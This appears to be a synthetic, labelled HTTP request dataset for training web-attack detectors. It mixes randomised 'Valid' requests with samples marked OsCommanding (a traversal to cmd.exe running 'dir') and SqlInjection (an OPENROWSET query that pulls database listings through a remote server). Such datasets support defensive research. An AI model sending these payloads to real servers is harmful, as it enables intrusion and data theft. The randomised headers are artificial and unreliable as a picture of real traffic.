Via: 7.4 110.65.240.219, FTP/3.9 63.39.80.209, FTP/4.8 www.hhigoee.jpeg
Transfer-Encoding: compress
Upgrade: ca5umo/2.1, neaa/3.0
Warning: 813 217.129.214.222 "datp" 
X-Forwarded-For: 152.153.32.113
X-Serial-Number: 9495993319607061113
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SRFq.1xOA8=n'sOeonrstt&Sorha=hG-rxF&mistn=38&nlyu=i6o&5Elep4Nt=d-RMNPxmCiy&naym4jmqu62a=thobVs&trthnon=y3ahzn&RD0positionK1=00&tm=3154

End - Id: 33786
Start - Id: 14217
class: Valid
GET /oEh/tsglThnn.tiff?Bbtr8ticz0beoe=tDkSXhTSZRu&aehgond=iocM6f9NO8m&@T0I=2aE+sbm%28%24n3n&aseilmta=+s8execoi+otN%5D&UweOoesegeq9=orr%40Desaqeh HTTP/1.1
Host: www.eeaeoJi.biz:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-2022-kr, koi8
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: min-fresh=6219
Client-ip: 107.40.158.6
Cookie: rtzare=oRQF;ofzvnnLh=iFlW
Cookie2: $Version="28"
Date: Sun, 09 Dec 07 12:30:57 GMT
ETag: "j1HMqVfKtpVr9OC29Y4"
Expect: yeDywno7
From: hoeiim@ceoiedong.st
If-Modified-Since: Mon, 23 Jan 06 05:37:05 UTC
If-Unmodified-Since: Mon, 08 Mar 04 11:35:57 GMT
If-Match: "z8pVtqYJSPaq3atASjcK"
If-None-Match: "8zwBq0tEQ3mREW9Kz1hH"
If-Range: Sat, 19 Jul 08 09:23:31 CET
Max-Forwards: 61
MIME-Version: 0.5
Pragma: p=nsoesmot
Proxy-Authorization: dndh ietm=rse69h3
Authorization: nuGtuw txQhm=eefs
Range: 835-87
Referer: http://www.sauj.com/iheLi/aoiyg4pl/a4jtae/npdorrrn.png
TE: deflate
Trailer: Accept-Charset
User-Agent: eotsu2am/4.5.0
UA-CPU: x86
UA-Disp: 985,925,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 962x171
Via: FTP/6.3 142.14.186.136:407, HTTP/4.5 www.0osun.shtml
Transfer-Encoding: deflate
Upgrade: tqng/4.9, Naqt/0.6
Warning: 356 101.30.2.191 "yoi1l" 
X-Forwarded-For: 210.15.101.50
X-Serial-Number: 8726872524288200
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14217
Start - Id: 32732
class: Valid
PUT /ecXeq1etoppfqtu/xEsyZNIKkso/ox0rd4a/tSjYLB/fee/tSVcMt95/aapteweSriietOa/iutummDdFlsc/1DqqP1iW/rT5Qi.tiff? HTTP/1.0
Content-Length: 183
Content-Language: Eop,dj,eee
Content-Encoding: compress
Content-Location: http://hPbli.ch/ttluis/6tltis1g.mdb
Content-MD5: ZmVpeWFld3JoeVRlcjNkdw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Jun 04 24:43:24 GMT
Last-Modified: Sat, 18 Apr 09 11:08:46 UTC
Host: 164.248.252.32
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oheoaaei-8ryb, clKiTlb-od;q=0.3
Cache-Control: no-cache
Client-ip: 103.216.102.1
Cookie: .YD2i.Ltmp2Q3Z=o;tihep9zsheeOn='r<da
Cookie2: $Version="7"
Date: Fri, 13 Jan 06 01:21:34 GMT
ETag: "P4rYQxRGmRWfYPzbnT"
Expect: inEtim
From: eaop5a@jraia3l.uk
If-Modified-Since: Fri, 09 Jul 04 16:01:40 UTC
If-Unmodified-Since: Sun, 15 Mar 09 06:42:30 CET
If-Match: *
If-None-Match: "gWD57OyMmlxxWQzN"
If-Range: "EEuCfFUbeJCl.a.wNnP"
Max-Forwards: 697
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM bTR0ZWlyMnBpYW15ZXR0NWxlcGFoM2VpdDZzYTR1YWlyRXJvc25uaXQ=
Authorization: Digest uri=http://www.eiiesntf.net/9genFto/dteE.php4
Range: -41512,-04591,6-
Referer: http://hhLcvrst.biz/eoDalneg/m7ge.mdb
TE: gzip,deflate;q=0.0
Trailer: Max-Forwards
User-Agent: Mozilla/7.7 (Windows; U; Win98 7.6; il-au; rv:9.8.9) Gecko/89413070
UA-CPU: Sparc
UA-Disp: 2397,8345,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1032x4856
Via: e3s/6.2 216.37.220.202, 2.3 www.cfbnU.jpeg, 7.6 75.51.200.138
Transfer-Encoding: deflate
Upgrade: Ontms/2.9, ocVpad/2.0, t7o/2.5
Warning: 192 5.69.98.20 "aslrVau" 
X-Forwarded-For: 154.7.116.173
X-Serial-Number: 16114956793159
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

oeeq=OoogtncatiQgat&2-libpassthrukj2.Q=eptlldab&edem8uar=aC4SS&I1_W=?rI8Ic&1iN1=]7baHwhtag&eTQisecCxeruNf=gC &ti=erllogte8c|3hcac3&aot=7~bt(xml%ae eHln'&rEseo9k8xiaR6=56

End - Id: 32732
Start - Id: 18315
class: Valid
GET /ncecose/IakF1Ybi8iBEkDand/iNgu1fSa2@I/Hc2/MO.-@P0b8BtmpqidQ/ti2fexo59e/Dewetee.cfm? HTTP/1.0
Host: 99.215.14.151
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=1170
Client-ip: 215.36.116.35
Cookie: TN35kQl=n3'fo
Cookie2: $Version="4"
Date: Thu, 15 Feb 07 02:31:12 GMT
ETag: "uhksSzdVKdXbiQ9ZQ"
Expect: rvsav2=sltuna;ndynn
From: dnouclte@Kesusuhhls.de
If-Modified-Since: Tue, 24 Feb 04 06:53:52 CET
If-Unmodified-Since: Fri, 15 May 09 24:14:03 GMT
If-Match: *
If-None-Match: "8Q1SUYCtSVsX7n4JQmx"
If-Range: Thu, 29 Apr 10 07:04:16 UTC
Max-Forwards: 3
MIME-Version: 6.5
Pragma: epst='r3'
Proxy-Authorization: NTLM dWVhM3Joc3d4YXJ0YW9udVNhdEx4aWVtZWhkYWFoYXRhYmFpTA==
Authorization: Basic ZmVtYWw6aWNjdQ==
Range: 33-392,-2077,7-8592
Referer: http://taoe.fr/ri3ywl.mdb
TE: chunked,trailers
Trailer: Authorization
User-Agent: cbgtiiyj0Ulza
UA-CPU: x86
UA-Disp: 967,4917,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0744x394
Via: HTTP/6.4 www.hnosieW.jpg
Transfer-Encoding: 8rctea; tew2T=ie4oT
Upgrade: geO/3.5
Warning: 253 24.0.106.147 "r6nyEsuNdiuaaAlcTsi" "Sat, 27 Mar 04 01:27:38 CET"
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 31774201
----: ------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 18315
Start - Id: 36599
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 250.179.44.18:80
Connection: aiocirgn
Accept: */*;q=0.6
Accept-Charset: iso-10646-ucs-2;q=0.5, windows-1257, iso-8859-2;q=0.7, windows-1254
Accept-Encoding: *
Accept-Language: a-hefj, lei-ynsrr0hd, li-ta;q=0.7, gs-a7uayvn;q=0.8
Cache-Control: 7d='lvo'
Client-ip: 3.238.183.148
Cookie: mP1pjbunionJQ=4;rEzhzeiidEj8eQe=ea:3 Mwelao~reeSyt;nzgWZMC=640
Cookie2: $Version="158"
Date: Thu, 04 Mar 10 11:17:35 CET
ETag: "brrPaM5WIoSw@vhd-qD"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Thu, 28 Sep 06 10:32:44 CET
If-Unmodified-Since: Sun, 28 Jun 09 01:24:08 CET
If-Match: *
If-None-Match: "y3-OKVTeDdF14ozbiQ9"
If-Range: Tue, 15 Jul 08 04:54:36 UTC
Max-Forwards: 365
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Basic aG1pbDk4YzptZTNlcA==
Range: -23163,-7
Referer: /ohBf/Gxpwto.mpeg
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/7.0 (Windows; U; WinNT 8.8; ns-cm; rv:2.8.1) Gecko/72752913
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: uowA1/4.3 www.eAnw04.htm
Transfer-Encoding: identity
Upgrade: uof/2.1, pIto/5.6, Weac/8.2, o0shyf/1.7
Warning: 749 www.Tr23iqts.html "ontttfrynef0akictteo" "Sun, 16 Nov 08 15:04:07 CET"
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36599
Start - Id: 12379
class: Valid
GET /ysrYn1y/bsez/DiZqaevalXacceptm/MexecmTa32mjA63U_E/ih_UEDre9l/tti4gqoboPSyent/yseawpTilct/fvBJvxlPVlacwcuG/s0rsJ/ea_T./e.6l8HTu31s5/onwtsncj.jpg?tItj4r=hnahau&EhhaAio=t&tarhzrnaWnogi=GpFielI9s5oilg&variNc=serviceseechodg&jPnclusgetsd7=a&FpupdatetNI=arotdehmdrdldnNbIa HTTP/1.0
Host: www.bbneetoBai.cz
Connection: eIho
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: tmYut5Aa-tosAag
Cache-Control: no-store
Client-ip: 98.43.226.106
Cookie: osra2gainsb=3thsnteimn?;esreAargswblo=P;rr] whusrO dtexecT;43seouwnfarw=rN2T06DEd;1Micaxaobms=u4q0gE_mwzTg
Cookie2: $Version="00"
Date: Sat, 17 Jul 04 14:01:32 GMT
ETag: W/"50JF3_OCAGlVU-EYX"
Expect: 100-continue
From: nn9ptett@eneaTr.com
If-Modified-Since: Fri, 15 Oct 04 02:16:24 UTC
If-Unmodified-Since: Fri, 13 Jun 08 19:15:00 GMT
If-Match: "fGzMjEZav.MNlxgb"
If-None-Match: *
If-Range: Wed, 30 Apr 08 24:50:08 UTC
Max-Forwards: 163
MIME-Version: 7.5
Pragma: eeatHs=l7rNrt9E
Proxy-Authorization: DuJm tcmeteLj=bonrctac
Authorization: leuiuF amatntoi=emrlitb
Range: -51069
Referer: /qter6rs.swf
TE: trailers,deflate
Trailer: User-Agent
User-Agent: trboipl0s5otn
UA-CPU: 68000
UA-Disp: 1831,152,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8258x863
Via: 5.4 128.19.80.121, 8.9 208.147.249.137, 1.1 www.iNetbmb.html:50
Transfer-Encoding: deflate
Upgrade: ntp/2.8, lo7i86/1.7, Akwh/9.8, 0ehman/7.3, lohca/6.7
Warning: 502 103.250.166.240 "Eioyinr" 
X-Forwarded-For: 15.44.254.140
X-Serial-Number: 250138591797251529
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12379
Start - Id: 41707
class: SqlInjection
GET /DosubyA7utId/ui7sritidihapngvxeyq/umtsvn9Oe0ergwg/svn/frdssittcahe/oARVp.css?slieol=a4saz&3qsyD0hcl1Cket=kil&TCCtQiFqp=%3B+++++insert+++into+++++OPENROWSET%28+++%27SQLoledb%27%2C%27uid%3Dofh4sin%3Bpwd%3DUbr%3BNetwork%3DDBMSSOCN%3BAddress%3D32.154.159.184%2C1433%3B%27%2C%27select+++++*++from++++_sysdatabases%27++%29%3B+++select+++++*+++++from+++++LinkedOrRemoteSrv1.master.dbo.sysdatabases&gaceu9ag=ttt5sle&hN9link..YS2n=v+ HTTP/1.1
Host: 145.134.201.172
Connection: reial2ru
Accept: */*
Accept-Charset: euc-jp;q=0.4, euc-jp
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 173.191.187.99
Cookie: acnti=e4Y32uwP._;XwGWU.L=rRZ6XQ0;ahbt5utrger=13;tascanopecn=uIXo
Cookie2: $Version="0"
Date: Fri, 06 Apr 07 09:25:22 GMT
ETag: W/"n.kuSNHdWwh7jG28iD8T"
Expect: Aegwua7=keneAcmn;torumEet=iitsHovu
From: oo2sso@fOothntR.fr
If-Modified-Since: Sat, 09 Sep 06 05:05:39 CET
If-Unmodified-Since: Fri, 22 Jul 05 20:23:29 GMT
If-Match: *
If-None-Match: "qFgmRnpRNUk82_NNw@h"
If-Range: Fri, 27 May 05 17:51:41 CET
Max-Forwards: 36
MIME-Version: 5.8
Pragma: p8U='h'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM ZWFpYXVlazZpT25lbmVvbWhhZXNlUDJ0YVU0RXJVb3VpaQ==
Range: 864538-4,42725-309719
Referer: /lcdre/cone1e/sixuel.asp
TE: chunked;q=0.7
Trailer: Via
User-Agent: hpeliroy/5.0.3.2.9
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8765x189
Via: HTTP/0.2 www.orcbefoE.html, 6.9 81.211.65.19
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 196 174.84.69.81 "ewttXoTtla" 
X-Forwarded-For: 93.102.101.223
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41707
Start - Id: 9307
class: Valid
GET /netcatBwQA/wE/dXV9CAaEUU-yNb5/eugS.BjONloKrvLTZgf6/aj-/1y-Herl.11ArEtjQhA8R/DX-s8RA/2kDD7_Z09SpdRD30T/oOWJhFvlS.html?rxyeseiti6=nVu1P.E0&tesom=357&llewoyzEbnuF=iweoj&cdinl4tgyouh2=92864&Nom7=25568256&uuaostrtna=584&uihcrdTbscidla=3700&dwnehb3s=50865&ld6akeacute=s14eSoj&aetarwMN=t6dpXzgzoteye&itoatyme5Sireb4=871748&MvQ6Gi3sjnhavingZ=5&6Bi2l_KK=teit HTTP/1.1
Host: 155.166.199.212
Connection: sooRhYed
Accept: */*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: compress
Accept-Language: i8oppme-pUiawue;q=0.1, uNe6sey-hr;q=0.8, hJ4az-owtg
Cache-Control: max-stale
Client-ip: 61.222.135.185
Cookie: ojf2Cezes=aah;tolmhaLNuk=@rt
Cookie2: $Version="51"
Date: Sun, 08 Jan 06 10:09:33 UTC
ETag: W/"FkAJ4vKKqht86LkE2C"
Expect: 100-continue
From: eLSnI@wc8tg.it
If-Modified-Since: Fri, 16 Nov 07 05:42:01 CET
If-Unmodified-Since: Sat, 21 Jun 08 21:01:09 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 26 May 04 03:33:36 UTC
Max-Forwards: 8817
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM OVJwbmloc2FmMWNUc2lka0hlYmQwdGtvdHRoSW9vZWhy
Range: 544-,11709-076
Referer: http://rnfp.com/eomfany.mspx
TE: trailers,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.7 (compatible; Konqueror/1.3; Win98; sdeCaaRrlh; shuho)
UA-CPU: 68000
UA-Disp: 7621,4110,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 766x0669
Via: 4.0 www.g5wA.html, FTP/2.4 97.130.140.252:82
Transfer-Encoding: okcsgR
Upgrade: u0F/4.5, tzae/8.8, r6d/0.0
Warning: 170 83.104.71.61 "wr0hialdc" 
X-Forwarded-For: 156.126.164.181
X-Serial-Number: 8554851
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 9307
Start - Id: 41328
class: SqlInjection
GET /tX/Q7N0aUmr8bdocumentFDEU/29GmU_ViGKpnSCk.tiff?tTzE.=dfde&Ee1=52681133&avroeeiodrbIe=4551268&to=syBlG%40a%40xP&5t3eonhsogdetT=3232321141&tOvkh=+sseswesiRl7r&Eae=eBg&tserbcsnl=dlwwcxdcehsadacw&U8SKNY=tHee%5D&sadeaoEtenierrT=47472852&rwSutn0gsnze=%29%5Doimgd+%40ytuiradminoptrinsertxn%3A&kylpbc6aoraele=haqOHoqD3a HTTP/1.0
Host: 154.71.224.110
Connection: slnnoes
Accept: text/plain;q=0.3, image/*
Accept-Charset: windows-1250, x-mac-chinesetrad;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 208.134.75.121
Cookie: lyuathehga=502607353;ds8K=eadrizsexeeg;ithrwiwe7reOr=OEltgarjekrddevren;trh='select     customer_phone     '||'from   customers '||'where    customer_surname='''|| lv_surname||'''   and   customer_type=1';
Cookie2: $Version="44"
Date: Fri, 18 Apr 08 22:14:20 CET
ETag: "K5YDmtSF-2KFk0_fdfD"
Expect: TeNzoaY
If-Modified-Since: Mon, 25 Dec 06 09:33:23 GMT
If-Unmodified-Since: Fri, 23 Dec 05 04:48:47 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 2.7
Pragma: Mak3azi='oE0gp6a'
Proxy-Authorization: aOscx rtu8=4sni
Authorization: NTLM b21hbm5hdGJpaE5yYXFodG5lZWh3aGhvMVZvaG50ZWVyc2V0aGVyeXFhb2VwaTRx
Range: -71,-00,-797
Referer: http://n4zu.de/uehru/ane7clu.pdf
TE: trailers,gzip
Trailer: Accept-Charset
User-Agent: o7esne/5.2.4.6.1
UA-Disp: 1321,3529,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4725x3211
Via: 9.5 86.20.248.81, 9.3 79.187.166.157, HTTP/2.0 227.10.5.249
Transfer-Encoding: identity
Upgrade: wNr3h/2.0, bss/8.7, iho/9.9
Warning: 344 215.115.174.216 "8iczmraastofnar" 
X-Forwarded-For: 94.64.57.114
X-Serial-Number: 6745028
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41328
Start - Id: 12887
class: Valid
GET /e2S9WSea0ue/iA-DHv1HPw3oo/owi1deqineU9i/nBbI-awp@JJC2fd/vahphlso/W8/wuetoijeianf6ov/e0tlid/o-0FwXcJjm0BKifrqCJ/n5/nGhR.shtml?tluhhroheM=46&e4=7532337 HTTP/1.1
Host: www.mnij.be
Connection: esbr
Accept: audio/*;q=0.9, text/*, audio/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, identity
Accept-Language: *;q=0.9
Cache-Control: max-stale=14
Client-ip: 138.179.154.230
Cookie: tt1TeeauedhnM=323
Cookie2: $Version="53"
Date: Sun, 21 Feb 10 16:55:45 UTC
ETag: "AbE2PL0XG@2pJRa"
Expect: 100-continue
From: ngeagi8r@t1t7.com
If-Modified-Since: Fri, 18 Nov 05 06:03:27 CET
If-Unmodified-Since: Mon, 20 Mar 06 12:59:01 CET
If-Match: "WDRtgYhLt@Zy55T"
If-None-Match: *
If-Range: Mon, 25 Jan 10 19:07:20 CET
Max-Forwards: 5
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM bmZlY2dlYWVldG9vZXR0SGxob2VPaHRWZXN1YTVlNDl0ZWh1MXJzbWlud2Fy
Authorization: NTLM dGVwZXpyc2h0NmJ0ZHlodGwzdGxlRGh0c2VkY3NpaXRSbDZoZG50YmxlcGlP
Range: 35161-,-2,70941-
Referer: http://fuy2aqw.st/mioorN/Devenn/Spq0S/mNgenb.jpeg
TE: gzip,trailers
Trailer: Pragma
User-Agent: Mozilla/9.8 (Windows; U; Win 9x 4.4; eI-hc; rv:9.3.0) Gecko/39414712
UA-CPU: StrongARM
UA-Disp: 769,338,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8835x5264
Via: 9.3 75.138.151.240, 5.7 196.9.0.235
Transfer-Encoding: gzip
Upgrade: fwtrra/5.7
Warning: 657 108.119.89.134 "n3Eimiaj3lnutimDg" 
X-Forwarded-For: 236.47.167.85
X-Serial-Number: 4907746729509688
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12887
Start - Id: 34771
class: Valid
PUT /osj1/anr/Te6nauylbtp/xpa3EUapacee/rSK4N@vyOUYL8Gaott/j5/exGrHk6capFBOR7i.Ez8/ekSjoEyVCf_8.gif? HTTP/1.1
Content-Length: 178
Content-Language: en2
Content-Encoding: compress
Content-Location: /eahtb6/eltShE/feAzce/eylvhpuh/p03Esp.aspx
Content-MD5: YWZlcmRhYWVkb2VlM3RuaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Oct 09 09:08:02 GMT
Last-Modified: Sat, 12 Dec 09 03:47:02 GMT
Host: 178.39.191.86
Connection: uesr4rza
Accept: application/*;q=0.7
Accept-Charset: hz-gb-2312, windows-1254;q=0.7
Accept-Encoding: 
Accept-Language: mhcarcie-betge;q=0.8, I-ltest, nouttaae-eho
Cache-Control: no-cache
Client-ip: 100.1.231.182
Cookie: ntjaeE=8C3RhAGj;9r=uemt=wj oae4aywgg+1xp_;otEhue=06
Cookie2: $Version="20"
Date: Mon, 02 Jun 08 13:03:10 GMT
ETag: "1vKuQnBhTCfQ8PE"
Expect: rnuaet
From: 4nxqdb@y0cwsr.uk
If-Modified-Since: Thu, 23 Aug 07 08:09:38 GMT
If-Unmodified-Since: Thu, 02 Sep 04 11:21:34 CET
If-Match: "N8PIPLjQZU1FRaFS@T"
If-None-Match: "J8RPge7vsKnwIZ2G3U1S"
If-Range: Sat, 04 Jun 05 01:04:12 GMT
Max-Forwards: 57
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: sssem eiteh9=s7a8xhej
Authorization: NTLM d2l0aW9zYm9xbW9sbW1tMHVmc3V0c2VlYXJzZmUzbGhvYU5zMmlkbmV6YWdh
Range: 40725-825,171943-,0918-722285
Referer: http://www.hmaC.cz/ofSw8ec/SkenrtR.bin
TE: chunked,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/1.2 (compatible; MSIE 3.1; Windows NT; iNsre)
UA-CPU: MIPS
UA-Disp: 456,5311,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 262x4505
Via: 3.5 www.anee.gif, FTP/4.5 www.aoijhTsn.tiff
Transfer-Encoding: identity
Upgrade: Zem/1.3, pcRSe/9.2
Warning: 563 www.oSibytw.htm "7HeelDne" 
X-Forwarded-For: 59.6.197.154
X-Serial-Number: 438515700357527
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

si=?-&tardiripg=r&7le1usdmhqi=e|aeDfohuigsystemwindow.openoallosxml&ijrawo4insln=e5&8tlhwrde=wspeoa  5daly&0OV2PtautoexecSDPpX=oahteniI3o&cDneEa1laeu=0Mxl.erTFs&nsnit8HpSlc=A

End - Id: 34771
Start - Id: 6750
class: Valid
POST /e4issh0/tulexipoeesti/4ttrpierepntl9.mdb? HTTP/1.0
Content-Length: 264
Content-Language: r
Content-Encoding: deflate
Content-Location: http://fTysi.cz/e3isslA/eim8/lei6eIz/ssbr2elk/8gh82szk.js
Content-MD5: YWNlMDh4cGFlb3JsdHQ0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 03 Mar 04 08:23:55 CET
Last-Modified: Fri, 21 Apr 06 23:29:31 CET
Host: www.tH7shlGa.st
Connection: close
Accept: video/*;q=0.4, audio/*;q=0.3
Accept-Charset: iso-10646-ucs-2;q=0.7, x-mac-arabic;q=0.7, windows-1258, x-mac-hebrew
Accept-Encoding: 
Accept-Language: er7-bfoq9l, srgaab-npb8a;q=0.9, r7h-tN4en;q=0.9, kEgnueaS-fgnt8
Cache-Control: only-if-cached
Client-ip: 50.80.85.90
Cookie: smgraYmn=emeta;RB0uC0=3535976;ZBD@=2;ottaauafrwiiog=C8Amo4imac
Cookie2: $Version="94"
Date: Fri, 30 Nov 07 24:36:33 CET
ETag: W/"WNWeDTFmpVd0Q7FlxxKM"
Expect: 100-continue
From: tm3ytg@tnto1ssawe.cz
If-Modified-Since: Tue, 13 Feb 07 18:12:50 GMT
If-Unmodified-Since: Tue, 13 Oct 09 08:19:11 GMT
If-Match: "TKotkfxChEo27vW3"
If-None-Match: *
If-Range: "vZfI61-lLIlLGmP"
Max-Forwards: 596
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: sexaho eksno9h=fxRwiiai
Authorization: Digest qop=otqt
Range: 2-
Referer: http://www.esmgsg.it/f9atmHen/tzws/Lssorowr/nhidqs.tiff
TE: trailers,chunked
Trailer: Referer
User-Agent: jysUsn (i97csTIeRL; uNCrtSu6J; jPfByN)
UA-CPU: StrongARM
UA-Disp: 342,103,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3268x616
Via: 5.9 29.72.3.218, Tinnd/2.3 www.ieuu.js, 3.7 www.euneawig.shtml
Transfer-Encoding: gzip
Upgrade: rie/7.4, 5Iena/2.4, fuca/0.7
Warning: 343 www.aS74.js "ImalcxyglU" "Sat, 10 Jul 04 23:42:51 UTC"
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 5587841310492306
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

s4euaot=deletewindow.openr1 UzOyjd5een&Z93usrESZO@6N=sZVsOds&rjreshcga1=nacuiiiftitit&BEwpYbBjRka=268&moeqfutashop=fuoioDs&her2m=sbNeenscun1Ea7sege&tysStOsaeOysi=3632&FM@BRf4=tiz3&eelsamsln= sLe&gatfgtrdiln=131&Im21elpdg=ii4RcCuK_Dr&t5yihncrrtay2vd=63&uxL8DT=w+u

End - Id: 6750
Start - Id: 28358
class: Valid
GET /noj3rNcoGninasefto/sJPN7D4GEOBO30/tFdlgLy6xqeMSH/ymoTa5ioous4pt/iy3tt/Mm/j0kI6N/oI4n9yW/tyW3m8naUzMYCMW-Xy-i/Ahhsviugei7rHaPt/tIaktC2G_hd8Wih/iQzV8UxY.png?aou1wlaham5o=ve%24aftpeoXs&gHarcnmue=++++pyrirtta&8iott=opt3&uhifS=eteur&dnOiltra9nE4o=48745791&dzetnfmErcaentl=bKBiiZ1dwpt&tcse6t47Tez=rom1&hthnnhql8lof7eo=varnthrTeeetwoyIeh+h&peSsN@P=i HTTP/1.0
Host: 67.65.171.124
Connection: close
Accept: video/*;q=0.4, audio/*, text/*
Accept-Charset: koi8;q=0.5, utf-8
Accept-Encoding: *;q=0.1
Accept-Language: eEt-r;q=0.6, EdUwIdi-Egtjo;q=0.5, h-erdO, Stf-eixt
Cache-Control: no-transform
Client-ip: 228.194.151.128
Cookie: o0eva7PhTz=eIotuhnatpdn;r@etcB.R=o9-;9EEP2A=21686572
Cookie2: $Version="196"
Date: Fri, 11 Sep 09 07:30:22 CET
ETag: "Z8_.2x5.bSAj.YwmPE7"
Expect: inivei1=ohsivzO;hrs5jpr
From: sszbHesr@flnNa.be
If-Modified-Since: Mon, 16 Mar 09 16:33:00 GMT
If-Unmodified-Since: Wed, 22 Jul 09 15:03:12 UTC
If-Match: "0DrBJX_InKPII6JU"
If-None-Match: *
If-Range: Wed, 03 Mar 10 24:57:44 GMT
Max-Forwards: 107
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic dGVTNGE6VGZ0aA==
Authorization: Basic c2VlNWlFT206dUZ1bjJi
Range: 5-362340,-79,830-62
Referer: /e2iaaund/vsemrI5/kfh6Nyan/u0n1rccc.mpeg
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: rnrsmtrndNy
UA-CPU: StrongARM
UA-Disp: 547,716,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6491x0728
Via: HTTP/0.5 104.226.96.99, 3.4 250.93.225.233
Transfer-Encoding: ttsE5
Upgrade: mNe/8.8, ehIbla/4.3, s6oaa/4.9, cih/1.0
Warning: 976 163.70.1.255 "k7Tsaetaotwo" 
X-Forwarded-For: 156.99.87.237
X-Serial-Number: 3075652
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28358
Start - Id: 33018
class: Valid
POST /ecfseahf/UaliipgtcaaqNLmHae.tiff? HTTP/1.1
Content-Length: 86
Content-Language: Uts0icc,e
Content-Encoding: identity
Content-Location: /etlnm3ae.dll
Content-MD5: M2VyaXJDclBzZGNob2xUOA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 26 Oct 06 09:33:05 GMT
Last-Modified: Thu, 21 Jan 10 14:37:56 UTC
Host: www.aet7onJT.fr
Connection: keep-alive
Accept: video/quicktime, image/jpeg;q=0.1, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: identity, deflate
Accept-Language: acs-3io, Mirns-i5grni;q=0.3, r6ioynn-t;q=0.4, rEEuknti-nwtcHet;q=0.9
Cache-Control: max-stale
Client-ip: 36.212.245.152
Cookie: csbze4fxwSrn=173;pRPN=yfUWLmxjykl5;nNaiaiensOv=tN]N;nedw=82489
Cookie2: $Version="56"
Date: Fri, 17 Nov 06 15:24:43 UTC
ETag: "GP7kaAQq33Ofri04Vl"
Expect: 100-continue
From: ehaaCtxw@5artje7.it
If-Modified-Since: Mon, 23 Nov 09 09:04:16 CET
If-Unmodified-Since: Sun, 13 Jul 08 04:16:08 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9642
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: 6sria rhhuu=Ewb9
Authorization: Basic YlNtc2g6aXJhZTdzZQ==
Range: 7-92465,94144-369,501461-
Referer: http://hetssEd.uk/owoc/0idfet/Ejned.bin
TE: deflate,trailers
